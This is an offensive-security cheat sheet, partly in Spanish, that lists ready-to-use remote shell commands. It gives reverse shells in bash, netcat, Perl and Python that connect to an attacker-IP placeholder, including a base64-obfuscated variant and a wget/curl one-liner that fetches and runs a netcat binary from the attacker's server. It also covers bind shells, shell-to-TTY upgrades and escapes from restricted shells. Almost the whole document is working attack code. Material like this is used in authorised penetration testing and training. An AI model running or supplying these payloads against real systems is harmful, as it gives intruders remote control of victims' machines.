Linux/Unix

Reverse shells

Bash

bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'
bash+-c+'bash+-i+>%26+/dev/tcp/<attacker-IP-address>/<listen-port>+0>%261' # URL Encode
bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP-address> <listen-port> >/tmp/f
echo -n "nc.traditional -e /bin/bash <attacker-IP-address> <listen-port>" | base64 -w 0
bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDxhdHRhY2tlci1JUC1hZGRyZXNzPiA8bGlzdGVuLXBvcnQ+
`echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDxhdHRhY2tlci1JUC1hZGRyZXNzPiA8bGlzdGVuLXBvcnQ+" | base64 -d`

Netcat

/bin/nc -nv <attacker-IP-address> <listen-port> -e /bin/bash
/usr/bin/nc -nv <attacker-IP-address> <listen-port> -e /bin/bash
# Máquina atacante
cp /bin/nc .
python3 -m http.server 80
nc -lvnp <listen-port>

# Máquina victima
## wget
wget http://<attacker-IP-address>:80/nc -O /tmp/nc; chmod 755 /tmp/nc; /tmp/nc -nv <attacker-IP-address> <listen-port> -e /bin/bash
## curl
curl http://<attacker-IP-address>:80/nc -o /tmp/nc; chmod 755 /tmp/nc; /tmp/nc -nv <attacker-IP-address> <listen-port> -e /bin/bash

Perl

perl -e 'use Socket;$i="<attacker-IP-address>";$p=<listen-port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

# /bin/sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-IP-address>",<listen-port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# /bin/bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-IP-address>",<listen-port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash"]);'

Bind shells

Bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp <listen-port> >/tmp/f

Python

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",<listen-port>));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

Spawning TTY shell

General

script /dev/null -c bash
Ctrl+Z
# Para ZSH debe ser ingresado en una sola línea stty raw -echo;fg
stty raw -echo
fg
reset xterm

# Obtener el valor de las siguientes variables desde otra ventana de terminal maximizada
echo $TERM
stty size

# Aplicar los valores obtenidos en la shell obtenida
export TERM=<term>
export SHELL=/bin/bash
stty rows <rows> columns <columns>

Python

which python
which python3
/usr/bin/<python-version> -c "import pty; pty.spawn('/bin/bash');"

sh

script /dev/null -c bash

Escapar shell restringida

man ls
shift + 1
!bash
vim
:set shell=/bin/sh
:shell

Última actualización